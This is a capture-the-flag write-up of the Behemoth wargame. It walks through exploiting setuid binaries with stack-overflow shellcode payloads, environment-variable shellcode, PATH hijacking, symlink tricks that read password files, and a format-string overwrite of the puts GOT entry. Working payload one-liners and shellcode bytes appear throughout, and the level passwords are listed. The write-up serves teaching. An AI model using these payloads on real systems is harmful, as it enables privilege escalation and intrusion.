Behemoth
A look into the exploitation of vulnerable binaries
0xd4y
April 20, 2021
0xd4y Writeups
LinkedIn: https://www.linkedin.com/in/segev-eliezer/
Email: 0xd4yWriteups@gmail.com
Table of Contents
Discovery of Format String Vulnerability
Memory Addresses of Useful Functions
Constructing Payload With GDB
Catching Behemoth6 Password Through UDP
Unlike Narnia, the source code for these binaries is not provided. Nevertheless, all eight binaries were successfully analyzed and exploited. This report covers attack techniques such as shellcode injection, format string exploitation, and privilege escalation through the PATH environment variable. Some binaries were more of a reverse engineering exercise (Behemoth 5 and Behemoth 6, for example), while others involved buffer overflow and format string exploits, such as Behemoth 7, a challenge that showcases an interesting way of bypassing shellcode filters.
The binaries were vulnerable mainly due to a lack of boundary checks and input validation. It is critical that the SETUID bits of these binaries are removed until the remediations in the Conclusion section are implemented. Below is the full listing of all passwords obtained from the compromised users:
Username  | Password
behemoth0 | behemoth0
behemoth1 | aesebootiv
behemoth2 | eimahquuof
behemoth3 | nieteidiel
behemoth4 | ietheishei
behemoth5 | aizeeshing
behemoth6 | mayiroeche
behemoth7 | baquoxuafo
behemoth8 | pheewij7Ae
The credentials for the first user were given as behemoth0:behemoth0. The SSH service is open on port 2221, and this SSH session was used to analyze the binaries discussed in this report.
Running the strings command on the binary reveals some interesting strings:
However, trying any of these potential passwords results in an “Access denied..” message. Using ltrace, a library call tracer, the library calls made by the binary can be observed after entering a password:
The ltrace output shows the binary comparing the user input to the secret password with the strcmp (string compare) function, which exposes the expected password, eatmyshorts, as one of its arguments. Entering this password grants access to the next level:
Now with a shell as the behemoth1 user, we can maintain persistence by grabbing the user's password from the /etc/behemoth_pass directory.
Running the behemoth1 binary, the following output can be seen:
After downloading the binary and using ltrace, the following output is found:
This binary is a little bit more secure in the sense that the password is not exposed by the strcmp function. Before trying to reverse engineer this binary, it is important to check for possible buffer overflow vulnerabilities. This can be done by sending a large input as follows:
behemoth1@behemoth:/behemoth$ ./behemoth1
The program was successfully crashed by sending a large input as can be seen from the “Segmentation fault” error. This is a strong indicator of a potential buffer overflow vulnerability.
Note how the cyclic utility was used to help determine the offset.
The output confirms the suspicion that this binary is vulnerable to a buffer overflow attack. The return address shown at the bottom of the output is 0x61617361, a 4-byte chunk of the cyclic pattern. The offset can be calculated using cyclic -l as follows:
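The cyclic -l lookup can be reproduced in a few lines of Python. This is a minimal sketch. It assumes pwntools' default pattern: a de Bruijn sequence over the lowercase alphabet in which every 4-byte substring is unique. The helpers `cyclic` and `cyclic_find` mirror the names of the pwntools functions but are re-implemented here for illustration:

```python
import string
from itertools import islice


def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Yield the de Bruijn sequence B(k, n) character by character.

    Standard recursive construction (concatenating Lyndon words in
    lexicographic order); every length-n substring appears at most once.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` characters of the pattern (like `cyclic 100`)."""
    return "".join(islice(de_bruijn(), length))


def cyclic_find(value, search_len=10000):
    """Offset of a 32-bit value read from EIP (like `cyclic -l 0x...`).

    x86 is little-endian, so the register value is converted back to the
    byte order in which those characters appeared in the input.
    """
    needle = value.to_bytes(4, "little").decode("ascii")
    return cyclic(search_len).find(needle)
```

With this pattern, `cyclic_find(0x61617361)` returns 71. That matches the 71 junk bytes used in the payloads that follow: the crash value 0x61617361 is the substring "asaa" read as a little-endian word.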
The offset is the number of bytes the binary accepts before the saved return address is overwritten. When the function returns, this saved value is loaded into the instruction pointer (the register that points to the next instruction to be executed). The hex addresses show that this is a 32-bit binary, and the file command can be used to verify this:
This binary is not stripped, meaning its symbols[1] (such as function names) are available. Additionally, the binary’s security features can be analyzed with the checksec command:
Since this binary has NX (no-execute) disabled, shellcode written onto the stack can be executed (provided that the payload is formatted correctly). Combined with control over the instruction pointer, this means the binary can be exploited with shellcode.
pwndbg> r < <(python -c "print 'A'*71+'B'*4")
Note how the return address was successfully controlled (42 is the hex value for B).
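For the sake of learning more about binary exploitation, I will go over two different methods of pwning: placing the shellcode on the stack directly after the overwritten return address, and placing it in an environment variable.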
We can create a payload that has the following structure:
JUNK_BYTES + ADDRESS_TO_SHELLCODE + NOP_SLED + SHELLCODE
This payload can then be passed to the binary, which will execute the shellcode. Many different shellcodes could be used; here, a simple /bin/sh shellcode[2] is used, which spawns a shell upon execution. The next task is to determine the address at which the shellcode will be located.
pwndbg> r < <(python -c "print 'A'*71+'B'*4+'C'*23")
Note that A is 0x41, B is 0x42, and C is 0x43 in hex.
Examining the memory at the esp register (the stack pointer, which points to the top of the stack), observe that the placeholder shellcode (the 0x43 bytes) starts at the second column of the row at 0xffffd03c. Since each column corresponds to 4 bytes, the address of the shellcode is 0xffffd03c + 4 = 0xffffd040.
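To make the layout concrete, here is a minimal Python 3 sketch that assembles JUNK_BYTES + ADDRESS_TO_SHELLCODE + NOP_SLED + SHELLCODE. It uses the offset of 71 and the address 0xffffd040 found above. The shellcode is deliberately a placeholder (0xcc int3 bytes), and the constant and function names are illustrative:

```python
import struct

OFFSET = 71              # junk bytes before the saved return address (cyclic -l)
RET_ADDR = 0xffffd040    # where the bytes after the return address landed in the GDB run
SLED_LEN = 100
# Placeholder: 23 int3 (0xcc) breakpoint bytes stand in for the real /bin/sh shellcode.
SHELLCODE = b"\xcc" * 23


def build_payload(offset, ret_addr, sled_len, shellcode):
    """JUNK_BYTES + ADDRESS_TO_SHELLCODE + NOP_SLED + SHELLCODE for a 32-bit target."""
    junk = b"A" * offset
    ret = struct.pack("<I", ret_addr)   # little-endian, e.g. 0xffffd040 -> 40 d0 ff ff
    sled = b"\x90" * sled_len           # 0x90 is the x86 NOP instruction
    return junk + ret + sled + shellcode


payload = build_payload(OFFSET, RET_ADDR, SLED_LEN, SHELLCODE)
```

Writing the result with `sys.stdout.buffer.write(payload)` and piping it into the binary is roughly the Python 3 equivalent of the python -c "print ..." one-liners used in this report. The difference is that Python 2's print also appends a trailing newline.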
With an understanding of how the buffer overflow works, we can now continue with exploiting the behemoth1 binary on the target system.
(gdb) disass main
Breakpoint 1, 0x08048462 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Password: Authentication failure.
Sorry.
0xffffd5c0 in ?? ()
Now that the payload has been written onto the stack, the memory around the ESP register can be examined to see which address marks the start of the shellcode:
(gdb) x/100x $esp-100
0xffffd55c: 0x00000000 0x00000001 0xf7fc5000 0xffffd5b8
0xffffd56c: 0x08048474 0x0804850c 0x41414154 0x41414141
0xffffd57c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd58c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd59c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5ac: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5bc: 0xffffd5c0 0x90909090 0x90909090 0x90909090
0xffffd5cc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd5dc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd5ec: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd61c: 0x90909090 0x90909090 0x6850c031 0x68732f2f
0xffffd62c: 0x69622f68 0x50e3896e 0xb0e18953 0x0080cd0b
0xffffd63c: 0x08048480 0x080484e0 0xf7fe9070 0xffffd64c
0xffffd64c: 0xf7ffd920 0x00000001 0xffffd7a5 0x00000000
The saved return address (the value that is loaded into eip) is stored at 0xffffd5bc. It is followed by the NOP sled. The shellcode begins at 0xffffd61c + 8 = 0xffffd624: 0x6850c031 is the first four shellcode bytes (31 c0 50 68) read as a little-endian word. Thus, the return address should work if it is given a value between 0xffffd5bc + 4 = 0xffffd5c0 and 0xffffd624.
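The reasoning above can be checked mechanically: the NOP sled sits between the saved return address and the shellcode. Below is a small sketch that rebuilds the bytes from the relevant rows of the dump (transcribed by hand here) and reports the usable range of return addresses. It assumes the sled is the only run of 0x90 bytes in that region:

```python
import struct

NOP = 0x90


def words_to_bytes(base, words):
    """Map GDB `x/x` 32-bit words back to individual bytes (x86 is little-endian)."""
    mem = {}
    for i, word in enumerate(words):
        for j, byte in enumerate(struct.pack("<I", word)):
            mem[base + 4 * i + j] = byte
    return mem


# Words transcribed from the dump, starting at 0xffffd5bc:
# the saved return address, 25 words of NOPs, then the first shellcode words.
dump = [0xffffd5c0] + [0x90909090] * 25 + [0x6850c031, 0x68732f2f]
mem = words_to_bytes(0xffffd5bc, dump)

sled = sorted(addr for addr, byte in mem.items() if byte == NOP)
sled_start, sled_end = sled[0], sled[-1]
shellcode_start = sled_end + 1
print(hex(sled_start), hex(sled_end), hex(shellcode_start))  # 0xffffd5c0 0xffffd623 0xffffd624
```

In this GDB run, any return address from 0xffffd5c0 up to 0xffffd624 should reach the shellcode. Outside GDB the stack is shifted slightly, so the address still has to be tuned on the target.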
behemoth1@behemoth:~$ python -c "print 'A'*71 +'\xd0\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|/behemoth/behemoth1
It is important to note that upon piping this payload into the binary, we did not receive a Segmentation fault error but rather an Illegal instruction error. This error occurs whenever a program jumps to an address containing bytes that cannot be decoded as a valid instruction. The bytes may be plain data, or execution may have landed partway through an instruction (hence the alternative name, illegal opcode error). This indicates that the payload most likely works, but the return address needs to be adjusted so that it points to an address from which the shellcode is interpreted correctly. After slightly decrementing the address a few times, the following is found:
behemoth1@behemoth:~$ python -c "print 'A'*71 +'\xbb\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|/behemoth/behemoth1
Note that no error is displayed now.
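The program is most likely executing the shellcode, but no interactive shell is received. This is because the spawned shell reads from the same pipe as the binary. Once python finishes writing the payload, the pipe reaches end-of-file and the shell exits immediately. Appending ;cat - inside the subshell keeps the pipe open and forwards our terminal input to the shell, and the exploit works as intended: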
behemoth1@behemoth:~$ (python -c "print 'A'*71 +'\xbb\xd5\xff\xff'+'\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'";cat -)|/behemoth/behemoth1
Alternatively, it is possible to exploit this binary by using environment variables.
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ export EGG=$(python -c 'print "\x90\x90\x90\x90\x90\x90\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x6
We can then write a C program that reports where this environment variable will be located in the memory of the targeted binary.
#include <stdio.h>
After compiling the program with gcc, it can be executed to find where the EGG environment variable, which holds the shellcode, is located in the memory of the target binary:
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ gcc -m32 find_addr.c -o find_addr
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ ./find_addr EGG /behemoth/behemoth1
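The full source of find_addr is not reproduced here. However, the fact that it takes the target's path suggests it corrects for the difference in program-name length between itself and the target. Below is a sketch of that correction. It assumes find_addr follows the widely circulated getenvaddr.c heuristic, which is an assumption; `adjust_env_addr` is a hypothetical name:

```python
def adjust_env_addr(addr_in_helper, helper_path, target_path):
    """Estimate an environment variable's address inside another program.

    Heuristic from the common getenvaddr.c (assumed, not confirmed, to match
    find_addr): environment strings sit near the top of the stack, so they
    shift when the program name stored there changes length. The factor of 2
    reflects that heuristic's assumption that the name is stored twice.
    """
    return addr_in_helper + (len(helper_path) - len(target_path)) * 2
```

For example, "./find_addr" is 8 characters shorter than "/behemoth/behemoth1". Under this heuristic, the variable would sit 16 bytes lower in the target than in the helper.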
Since the shellcode is at 0xffffddd3, the payload can be constructed to point to this address:
behemoth1@behemoth:/tmp/dfghoifdghfoidghiodfh$ (python -c "print 'A'*71+'\xd3\xdd\xff\xff'";cat -)|/behemoth/behemoth1
As the behemoth2 user, the behemoth2 binary can now be executed.
After executing the binary, the program simply touches a file and then hangs:
behemoth2@behemoth:/behemoth$ ./behemoth2
Since this binary runs an external command (touch), the program is most likely calling the system function.
After downloading the binary onto the attack box, this binary can be further analyzed within Ghidra:
undefined4 main(void)
Toward the top of the program, the sprintf function writes the string “touch %d” into the local_2c buffer (with %d replaced by the ID of this process). It is essential to note that touch is invoked without its full path (i.e. /usr/bin/touch).
Furthermore, system is called twice: once inside the if statement, and once outside of it after a sleep of 2000 seconds. This sleep call is responsible for the hanging observed after executing the binary. The first call to system runs the touch command. The second call again uses the local_2c variable, but only after it is set to 0x20746163. Converting 20 74 61 63 into ASCII results in “ tac”.
behemoth2@behemoth:/behemoth$ file behemoth2
Since the file output shows an LSB (little-endian) executable, the value 0x20746163 is stored with its least significant byte first. The “ tac” string should therefore be read backwards, revealing “cat ”. Thus, the program first touches a file and then cats it after 2000 seconds.
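The byte-order reasoning can be checked with Python's struct module. This sketch simply packs the constant from the decompiled code in both byte orders (`le32_bytes` is an illustrative name):

```python
import struct


def le32_bytes(value):
    """Bytes of a 32-bit value as stored in memory on a little-endian (LSB) machine."""
    return struct.pack("<I", value)


print(le32_bytes(0x20746163))           # b'cat '
print(struct.pack(">I", 0x20746163))    # b' tac' (big-endian: the order the hex constant reads)
```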
This binary has multiple vulnerabilities, and each method of exploitation is described below:
Since this binary executes the touch command without using its full path, a file called touch that runs /bin/bash can be created (it must also be made executable, e.g. with chmod +x):
behemoth2@behemoth:/tmp/pathprivesc$ echo "/bin/bash" > touch
After creating this file with the aforementioned contents, the PATH environment variable can be updated to prioritize the current directory over all other directories:
behemoth2@behemoth:/tmp/pathprivesc$ export PATH=.:$PATH
Now, upon executing the behemoth2 binary, the call to touch will resolve to the newly created touch file:
behemoth2@behemoth:/tmp/pathprivesc$ /behemoth/behemoth2
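The lookup that makes this work can be illustrated with shutil.which. It searches a PATH-style list of directories in order, much as /bin/sh does when system() runs a bare command name. This sketch plants a harmless fake touch in a temporary directory and puts that directory first. The helper names are illustrative:

```python
import os
import shutil
import stat
import tempfile


def resolve(command, search_dirs):
    """Return the file a bare command name resolves to, searching dirs in PATH order."""
    return shutil.which(command, path=os.pathsep.join(search_dirs))


def demo():
    with tempfile.TemporaryDirectory() as attacker_dir:
        fake = os.path.join(attacker_dir, "touch")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho hijacked\n")   # harmless stand-in for /bin/bash
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        # attacker_dir comes first, just like the current directory in PATH=.:$PATH
        found = resolve("touch", [attacker_dir, "/usr/bin", "/bin"])
        return fake, found


fake, found = demo()
```

Because the planted directory is searched first, `found` is the fake file rather than /usr/bin/touch. The same precedence applies to cat.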
The same methodology used for the touch command can be used for the cat command. As seen from the analysis, the cat command is also being called without using its full path:
behemoth2@behemoth:/tmp/pathprivesc$ echo "/bin/bash" > cat
behemoth3
This method takes longer than the previous one because the binary sleeps for 2000 seconds before cat is executed.
This binary could still be abused even if the cat and touch commands were executed using their full paths. A symbolic link to the behemoth3 password file can be created so that the cat command reads the password of the behemoth3 user. The name of the link must correspond to the ID of the process. When the cat command reads the file, it follows the link to the credentials of behemoth3, and the password of the user is printed to stdout:
behemoth2@behemoth:/tmp/behemoth2$ /behemoth/behemoth2
Once the behemoth2 binary was executed, touch failed to create the file 10216. The process runs as behemoth3 and does not have permission to create files in a directory owned by behemoth2. The error leaks the name of the file, meaning that a symbolic link with this name can be created before the cat command gets executed (there are 2000 seconds to do so).
After logging into another session as the behemoth2 user, a symbolic link corresponding to 10216 can be created:
behemoth2@behemoth:/tmp/behemoth2$ ln -s /etc/behemoth_pass/behemoth3 10216
Note that this file is pointing to the password of the behemoth3 user.
After waiting for 2000 seconds, the password of the behemoth3 user gets printed out:
behemoth2@behemoth:/tmp/behemoth2$ /behemoth/behemoth2
After successfully abusing the behemoth2 binary, the next challenge is behemoth3.
We can begin the analysis by downloading the target binary onto the attack box and running the checksec command against it:
From the results of checksec and file, note that the binary has essentially no protections: every mitigation that could hinder exploitation is disabled. Additionally, the file is not stripped, so symbols will be available for debugging.
When executing the program, we are asked to provide an identification:
behemoth3@behemoth:/behemoth$ ./behemoth3
After inputting a large amount of A’s (in this example 500 A’s were used), the program prints out a minimized version of the string:
behemoth3@behemoth:/behemoth$ ./behemoth3
Despite 500 A’s being passed into the buffer, only 200 A’s were printed out. Ghidra can be used to better understand how this binary works:
Ghidra translated the assembly code of the main function into the following:
undefined4 main(void)
A char array called local_cc is declared with 200 bytes allocated to it. Afterwards, the fgets function limits the input read into local_cc to the size of this buffer, so the binary is not vulnerable to a buffer overflow. However, the user input (local_cc) is passed directly to the printf function as its format string, without any sanitization. Consequently, the program is likely vulnerable to a format string exploit[3].
This can be verified by passing a format string into the local_cc variable:
behemoth3@behemoth:/behemoth$ ./behemoth3
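After entering %x, the program printed a7825 instead (%x is a format specifier that prints an unsigned int as a hexadecimal number[4]). This value is 0x000a7825, which is the input “%x\n” (bytes 25 78 0a) read as a little-endian integer. In other words, printf took its first argument from the stack, and that argument happens to be the start of the input buffer itself. When the binary is given a format string as input, it leaks memory from the stack.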
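Decoding the leaked value confirms that printf read the input buffer itself. A tiny sketch (the helper name is illustrative):

```python
def leak_to_bytes(leaked_hex):
    """Interpret a %x leak as the 4 bytes stored on the (little-endian) stack."""
    return int(leaked_hex, 16).to_bytes(4, "little")


print(leak_to_bytes("a7825"))   # b'%x\n\x00'
```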
This vulnerability can also be abused to write to memory by using the %n format specifier, which stores the number of characters printed so far at the address given by the corresponding argument. The target can be a location the binary later relies on, such as the Global Offset Table (GOT) entry of a library function. In that case, the stored function address can be overwritten to point to shellcode, resulting in the execution of arbitrary code.
The objdump -R command lists the dynamic relocations of the binary. These include the GOT entries that hold the addresses of the library functions it uses:
behemoth3@behemoth:/behemoth$ objdump -R ./behemoth3
From the output, there are a total of three functions displayed (printf, fgets, and puts). However, the fgets and printf functions should not be overwritten, as these functions must work properly to accept the malicious payload. This leaves the puts function as the only candidate from the objdump output to be overwritten.
Before being able to overwrite the memory address of puts, the user input’s location within the stack must first be determined:
behemoth3@behemoth:/behemoth$ ./behemoth3
When inputting AAAA followed by a %x format specifier, the hexadecimal value of the A’s (41414141) is printed immediately. This means that the start of the user input is the first argument printf reads from the stack. Throughout this level, the malicious input will be written to a file so that the payload can be constructed with the help of GDB:
Using the address of puts found by the objdump command, the following payload can be constructed:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print '\xac\x97\x04\x08'+'%100x%n'" > overwrite
The \xac\x97\x04\x08 string is the address of the GOT entry of puts (0x080497ac) in little-endian form. It is followed by %100x, which prints a stack value in hex padded with spaces to a field width of 100 characters, and then by %n. The field width controls how many characters are printed before %n, so it is an effective way to control the value written to the target address.
When this payload is passed into the binary within GDB, a segmentation fault occurs; however, the value stored at the puts entry is not what was expected:
(gdb) r < overwrite
Observe that the value is 0x08048356 instead of a small number. The value should equal the number of characters printed before %n: 4 (for the address of puts) + 100 (the field width of %x), which is 104 in decimal and 0x68 in hex. The write did not happen because %100x consumed the first argument on the stack, which is the address itself. That left %n to use the next four bytes of the input as its pointer. Prepending AAAA to the payload gives %100x a dummy argument to consume, so %n receives the address of puts and the overwrite succeeds:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA\xac\x97\x04\x08' + '%100x%n'" > overwrite
(gdb) x/x 0x080497ac
0x80497ac: 0x0000006c
Note that the puts entry now holds 0x6c, which is 108 in decimal (the change from 104 is a result of prepending the four A’s).
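The value that %n writes can be predicted before running the binary. Below is a minimal model that assumes every byte before the specifiers is printed literally. That holds here, since none of the address bytes is % (0x25) or a null byte (`chars_before_n` is an illustrative name):

```python
def chars_before_n(literal_bytes, width):
    """Characters printf has emitted when it reaches %n in LITERAL + '%<width>x%n'.

    Assumes the value consumed by %x needs at most `width` hex digits, so the
    field is padded to exactly `width` characters.
    """
    return len(literal_bytes) + width


puts_got = b"\xac\x97\x04\x08"
print(hex(chars_before_n(puts_got, 100)))             # 0x68
print(hex(chars_before_n(b"AAAA" + puts_got, 100)))   # 0x6c
```

The same count explains the 0xef seen later for the two-address payload: 16 bytes of addresses and dummies, 100 NOPs, 23 shellcode bytes, and a width of 100 add up to 239.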
With the successful overwrite of the puts function, the next step is to control the address that it points to. Currently, it points to 0x6c, but this value must be changed to point to shellcode in order for the successful execution of arbitrary code. The particular methodology used to develop this exploit will work on the basis of overwriting the puts function address two bytes at a time. Thus, the final exploit will look like the following:
'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + NOP_SLED + SHELLCODE + FORMAT_STRINGS_TO_CONTROL_PUTS_ADDRESS
Note that there are two addresses within this payload: one is the address of the puts entry, and the other is that address + 2, which allows the value to be overwritten two bytes at a time. This also means that two %x specifiers must be used along with two %n specifiers. Additionally, a shellcode[5] of 23 bytes will be used.
To begin the exploit, the puts address must first be controlled with the help of format string padding.
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + 'S'*23 + '%100x%n'" > exploit
A NOP sled of 100 bytes precedes the 23-byte shellcode (denoted by the placeholder ‘S’). Following the shellcode is a %x specifier with a field width of 100. When executed, this writes 0xef to the puts entry (4 + 4 + 4 + 4 + 100 + 23 + 100 = 239 = 0xef):
(gdb) r < exploit
A segmentation fault occurred as expected, because the puts entry now points to an address that cannot be accessed. Ideally, it should point somewhere within the NOP sled. Since the NOP sled consists of 100 bytes, there are multiple addresses that would work for this exploit:
(gdb) x/40x $esp
The exploit begins at address 0xffffd4d8 + 8 (as can be seen from 0x41414141, which is AAAA). It is followed by the address of puts, another four A’s, and the address of puts + 2. Finally, the NOP sled begins at 0xffffd4e8 + 8 = 0xffffd4f0. For the purposes of this exploit, the address 0xffffd510 was chosen, which lies 32 bytes into the sled. In decimal, this value is 4294956304, which in theory could be written by a single %n after printing about 4294956304 characters. In practice, this is infeasible: even if the memory were available, printing that many characters to stdout would take a very long time. As mentioned in Exploit Development, this can be bypassed by using two %n format specifiers that write to two addresses two bytes apart.
The largest value needed for each half of the address is 16^4 - 1, which is 65535. This greatly reduces the 4294956304 characters previously mentioned. Incidentally, the largest value representable in 32 bits is 16^8 - 1, which is 4294967295 or 0xffffffff.
A value of 0xef was written to the puts entry; however, 0xd510 was desired for the lower two bytes. The padding necessary to achieve this value can be determined through the following calculation:
desired_output - current_output + current_padding
(gdb) p 0xd510 - 0xef + 100
Thus, a padding of 54405 is needed to output 0xd510:
(gdb) r < exploit
The lower two bytes were successfully overwritten to 0xd510. The same method can be used to overwrite the two most significant bytes:
behemoth3@behemoth:/tmp/overwrite_puts$ python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + 'S'*23 + '%54405x%n%100x%n'" > exploit
Note that a padding of 100 was picked arbitrarily for the second %x, so that the resulting value could be observed and used in the following calculations:
After inputting a padding of 100 bytes for the two most significant bytes, the subsequent value was determined to be 0xd574:
(gdb) r < exploit
The correct padding can subsequently be calculated:
(gdb) p 0xffff - 0xd574 + 100
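The two-write arithmetic can be captured in a short helper. This sketch makes the same assumption as the GDB calculations: each %x field is printed at exactly its width. It splits the target into the halves 0xd510 and 0xffff used in the text and reproduces both widths (function names are illustrative):

```python
def split_halves(target):
    """Split a 32-bit target into (low 16 bits, high 16 bits)."""
    return target & 0xffff, target >> 16


def next_width(desired, observed, current_width):
    """desired_output - current_output + current_padding, as used in the text.

    %x prints up to 8 hex digits, so a width below 8 would not be exact; in
    that case wrap around by 0x10000, since only the low 16 bits of each
    count end up in the half of the target being written.
    """
    width = desired - observed + current_width
    while width < 8:
        width += 0x10000
    return width


low, high = split_halves(0xffffd510)
first = next_width(low, 0xef, 100)        # width for the first %x
second = next_width(high, 0xd574, 100)    # width for the second %x
print(first, second)                      # 54405 10991
```

The second %n writes its full 4-byte count at puts + 2. Its upper bytes therefore spill past the puts entry, which is harmless here because only puts is called after the overwrite.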
Therefore, the final exploit will look like the following:
python -c "print 'AAAA' + '\xac\x97\x04\x08' + 'AAAA' + '\xae\x97\x04\x08' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x
Note that the S placeholders were also replaced with the actual shellcode. Executing this payload within GDB causes the debugged process to exit abruptly due to the execution of /bin/dash:
(gdb) r < exploit
When this payload is piped straight into the binary without GDB, a shell is returned:
behemoth3@behemoth:/tmp/overwrite_puts$ (python -c "print 'AAAA' + '\xac\x97\x04\x08'
Note that cat - is appended to the end of the payload. This is an essential part of the exploit: it keeps the pipe to the binary open and forwards terminal input to the spawned shell. Without cat, the shell reads end-of-file immediately and the process exits without errors.
Incidentally, when first performing the exploit of this binary, a /bin/bash shellcode[6] was used, however it did not work outside GDB for unknown reasons. When a binary exploitation does not work as intended, it could be beneficial to use a different shellcode to see if it resolves the problem.
With the necessary permissions obtained by compromising the behemoth4 user, the behemoth4 binary can be executed.
Before exploiting the binary, it is necessary to understand how it works.
Executing the binary does not result in anything out of the ordinary:
behemoth4@behemoth:/tmp$ /behemoth/behemoth4
The program simply prints out “PID not found!” and exits immediately.
Within Ghidra, we can get a further look at how the program is getting the PID, and what it does with it:
undefined4 main(void)
The program starts by declaring a couple of variables. The getpid function is called, and its output is stored in local_14. This PID is then used to build a path under /tmp, which is stored in local_30. Afterwards, local_18 is set to the result of opening the file at local_30, that is, the file in /tmp named after the ID of the binary’s process. If the file does not exist, “PID not found!” is printed. Otherwise, the contents of the file are read out using the getchar function within a while loop.
The problem with this program is that it trusts whatever file exists at that path in /tmp, a directory that any user can write to. A symbolic link placed there can therefore make the program read the password file of the behemoth5 user.
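To see why the symbolic link trick works, here is a rough Python model of the decompiled logic. It is an illustration only: `read_pid_file` and `demo` are hypothetical names, and the real binary is written in C. The demo plants a link named after a chosen PID in a temporary directory instead of /tmp:

```python
import os
import tempfile


def read_pid_file(directory="/tmp", pid=None):
    """Rough model of the decompiled logic: read <directory>/<pid> if it exists.

    open() follows symbolic links, so a link at that path can redirect the
    read to any file the process is allowed to open.
    """
    pid = os.getpid() if pid is None else pid
    path = os.path.join(directory, str(pid))
    try:
        with open(path, "rb") as f:
            return f.read()
    except FileNotFoundError:
        return b"PID not found!\n"


def demo(secret=b"password\n", pid=12345):
    with tempfile.TemporaryDirectory() as tmpdir:
        target = os.path.join(tmpdir, "secret")
        with open(target, "wb") as f:
            f.write(secret)
        os.symlink(target, os.path.join(tmpdir, str(pid)))   # the planted link
        return read_pid_file(tmpdir, pid), read_pid_file(tmpdir, pid + 1)
```

The first read follows the link to the secret file, while the PID without a link falls through to the “PID not found!” branch.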
Since the PID of the binary cannot easily be determined before executing the program, a bash loop can be used to create symbolic links for many possible PIDs. Before creating them, the approximate PID of the binary must first be found:
behemoth4@behemoth:/tmp$ ltrace /behemoth/behemoth4
This process was assigned the ID 22928, and it therefore looked for a file called 22928 within the /tmp directory. The PID on the next execution of the binary should be greater than 22928 and is likely less than 30000:
behemoth4@behemoth:/tmp$ for i in {22928..30000}; do ln -s /etc/behemoth_pass/behemoth5 $i;done
Now, when the binary is executed, it will read the contents of behemoth5’s password:
behemoth4@behemoth:/tmp$ /behemoth/behemoth4
By first logging into the account through ssh with the credentials found in Behemoth 4, the behemoth5 binary can be executed.
When executing the binary, nothing out of the ordinary occurs: the binary simply exits without printing anything to stdout. After downloading the binary onto the attack box, Ghidra was used to help analyze it.
void main(void)
After many different variables are declared, the password for the behemoth6 user is read into the program. Afterwards, the gethostbyname function is called with the argument “localhost”. Shortly afterwards, the socket function is called with the arguments (2, 2, 0). Observe the following code and the corresponding Ghidra output:
[Figure: three source snippets (Source1, Source2, Source3) shown next to their Ghidra decompilations (Ghidra1, Ghidra2, Ghidra3)]
The socket arguments of Ghidra3 are identical to those seen in behemoth5. Therefore, the arguments in the behemoth5 binary correspond to AF_INET (IPv4), SOCK_DGRAM (UDP), and protocol 0 (the default protocol for that socket type), respectively[7].
After the socket is created, iVar3 is set to 1337 before the sendto function is called. From these lines of code, it can be discerned that the password of the behemoth6 user is sent in a UDP datagram to port 1337 on localhost.
Before executing the binary, it is essential that another session be opened so that a UDP listener can be set up on port 1337:
behemoth5@behemoth:~$ nc -lup 1337 localhost
The -u flag specifies UDP mode, -p is for specifying a port, and -l tells nc to listen for inbound connections
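If nc is unavailable, a Python listener can do the same job. This is a minimal sketch with illustrative function names. Running `print(receive(bind_udp()))` in one session and then executing behemoth5 in another should print the datagram, assuming localhost resolves to 127.0.0.1:

```python
import socket


def bind_udp(host="127.0.0.1", port=1337):
    """Bind a UDP socket; socket(2, 2, 0) in the decompiled code is
    socket(AF_INET, SOCK_DGRAM, 0) on Linux."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    return sock


def receive(sock, bufsize=4096):
    """Block until one datagram arrives and return its payload."""
    data, _sender = sock.recvfrom(bufsize)
    return data


def loopback_check(message=b"test\n"):
    """Send one datagram to an ephemeral local port and read it back."""
    with bind_udp(port=0) as server, socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
        client.sendto(message, server.getsockname())
        return receive(server)
```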
After executing the binary, the password of the behemoth6 user can be seen on stdout:
Note that the blue line is a result of using tmux[8]; it marks the border between two panes.
